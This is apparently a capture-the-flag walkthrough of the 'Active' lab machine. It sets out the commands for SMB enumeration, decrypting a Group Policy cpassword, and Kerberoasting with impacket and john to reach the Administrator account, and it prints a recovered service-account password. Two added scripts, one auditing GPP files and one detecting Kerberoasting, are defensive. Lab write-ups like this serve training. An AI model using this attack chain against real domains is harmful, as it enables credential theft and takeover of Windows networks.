Scanning
Let’s scan the target IP with the nmap command below:
sudo nmap -p- -sV -A 10.10.10.100
It found a lot of open ports.
Enumeration
Let’s start enumerating them one by one. I started with the Samba ports using the smbmap tool:
smbmap -H 10.10.10.100
We found a share named Replication with read-only permission.
Let’s try accessing this share with smbclient as the anonymous user.
This share contains a directory named active.htb, which holds more directories and files. I tried listing them all with recurse on:
smb: \> recurse on
smb: \> ls
I downloaded the whole active.htb content to my local system with the commands below:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
and it downloaded all of active.htb, with its files and directories, onto our system.
Here I found a file named Groups.xml which contains an encrypted cpassword for the SVC_TGS user.
After researching a little about cpassword, I found this page: https://www.linkedin.com/pulse/what-heck-cpassword-phil-vanmeerhaeghe
Using the gpp-decrypt tool I decrypted this value:
gpp-decrypt <hash_here>
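The Groups.xml found above is a Group Policy Preferences file, and the cpassword attribute is the reason it matters: any domain user who can read SYSVOL can recover the stored password. The following script is an added example, not part of the original write-up or of any tool it mentions; it parses GPP XML files and reports every element that carries a cpassword, so a defender can audit a SYSVOL copy (or a share downloaded the way this write-up did) for leftover credentials. The sample XML, the account name in it and the cpassword placeholder are constructed; it also checks the other GPP file types that can carry cpassword (Services.xml, ScheduledTasks.xml, DataSources.xml, Printers.xml, Drives.xml), which the original page does not cover.

```python
"""Audit Group Policy Preference XML files for embedded cpassword attributes.

Added example, not code from the original write-up. It reports where a
cpassword occurs and for which account; it does not decrypt anything.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP file names that may carry a cpassword attribute (element names vary per file).
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Printers.xml", "Drives.xml"}

# Constructed sample modelled on a Groups.xml local-user entry.
# The cpassword value is a placeholder, not a real encrypted password.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\\SVC_TGS" image="2" changed="2018-07-18 20:46:06">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="PLACEHOLDER_CPASSWORD_VALUE"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""


def find_cpasswords(xml_text, source="<string>"):
    """Return one finding dict per element that carries a cpassword attribute."""
    findings = []
    root = ET.fromstring(xml_text)
    # cpassword is always an attribute, never element text, so walk every element.
    for elem in root.iter():
        cpw = elem.attrib.get("cpassword")
        if cpw is None:
            continue
        # The account attribute differs by file type: userName (Groups/Drives),
        # accountName (Services), runAs (ScheduledTasks).
        account = (elem.attrib.get("userName")
                   or elem.attrib.get("accountName")
                   or elem.attrib.get("runAs")
                   or "<unknown>")
        findings.append({
            "file": source,
            "element": elem.tag,
            "account": account,
            "empty": cpw == "",  # an empty cpassword stores no credential
        })
    return findings


def audit_directory(path):
    """Walk a local SYSVOL copy (or a downloaded share) and audit every GPP file."""
    results = []
    for p in Path(path).rglob("*.xml"):
        if p.name in GPP_FILES:
            try:
                results.extend(find_cpasswords(p.read_text(encoding="utf-8-sig"), str(p)))
            except ET.ParseError as exc:
                results.append({"file": str(p), "error": str(exc)})
    return results


if __name__ == "__main__":
    for finding in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(finding)
```

Run `audit_directory("active.htb")` against the directory downloaded with mget to get the same report for every policy in the share; the fix for any non-empty finding is to remove the preference item and rotate the account's password, since the value stays recoverable as long as the file exists in SYSVOL.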
Let’s use these credentials. After logging in with smbclient we find user.txt:
smbclient //10.10.10.100/Users --user SVC_TGS --password GPPstillStandingStrong2k18
Using get, I downloaded this file :)
Privilege Escalation via Kerberoasting
Let’s find and request the Service Principal Names (SPNs) associated with service accounts:
impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -outputfile spn_data
and we found a TGS ticket for the Administrator account.
Using john I cracked this hash:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
and we successfully cracked it.
Using smbclient with the Administrator user and the recovered password, we can access the Administrator user’s shares.
Now we can find our last flag, root.txt, inside Administrator/Desktop/.
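Every TGS that GetUserSPNs requested above was issued by the domain controller and logged there as Security event 4769, which is what makes this step detectable. The script below is an added example, not part of the original write-up; it runs a simple Kerberoasting detection over constructed 4769 records: it flags requests that use RC4-HMAC (TicketEncryptionType 0x17) for a service that is a user account rather than a computer account or krbtgt, and raises an alert when one requesting account asks for several such tickets inside a short window. The event records, the client IPs, the extra service names and the threshold and window values are all assumptions made for the example.

```python
"""Flag likely Kerberoasting from Windows Security event 4769 records.

Added example, not code from the original write-up. Field names follow the
4769 event XML (TargetUserName, ServiceName, TicketEncryptionType, IpAddress).
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"  # AES tickets are 0x11 / 0x12; RC4 is what cracking tools want

# Constructed 4769 records as a SIEM would extract them; not real logs.
SAMPLE_EVENTS = [
    {"TimeCreated": "2018-07-18T20:50:01", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2018-07-18T20:50:02", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2018-07-18T20:50:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "Administrator", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2018-07-18T20:50:03", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"TimeCreated": "2018-07-18T20:50:04", "TargetUserName": "SVC_TGS@ACTIVE.HTB",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    # Ordinary traffic: an AES ticket for a computer-account service.
    {"TimeCreated": "2018-07-18T20:55:00", "TargetUserName": "alice@ACTIVE.HTB",
     "ServiceName": "DC$", "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50"},
]


def is_roastable_request(ev):
    """True when one 4769 record looks like a TGS request made for offline cracking."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and not svc.endswith("$")      # computer accounts have random passwords
            and svc.lower() != "krbtgt")   # the TGT service itself is not a target


def detect_kerberoasting(events, threshold=3, window=timedelta(minutes=5)):
    """Return {requesting account: sorted service names} for accounts that asked
    for at least `threshold` distinct roastable services within `window`."""
    per_account = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            per_account[ev["TargetUserName"]].append(
                (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    alerts = {}
    for account, reqs in per_account.items():
        reqs.sort()
        # Slide a window forward from each request and count distinct services in it.
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(in_window) >= threshold:
                alerts[account] = sorted(in_window)
                break
    return alerts


if __name__ == "__main__":
    for account, services in detect_kerberoasting(SAMPLE_EVENTS).items():
        print(f"possible Kerberoasting by {account}: {services}")
```

In a domain that still negotiates RC4 for legitimate services the encryption-type check alone is noisy, which is why the burst count over a window does the actual alerting; the mitigation side is the same in either case: long random passwords (or group managed service accounts) for SPN-bearing accounts and AES-only Kerberos encryption so a captured ticket is not worth cracking.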
Active Machine Solved Successfully!!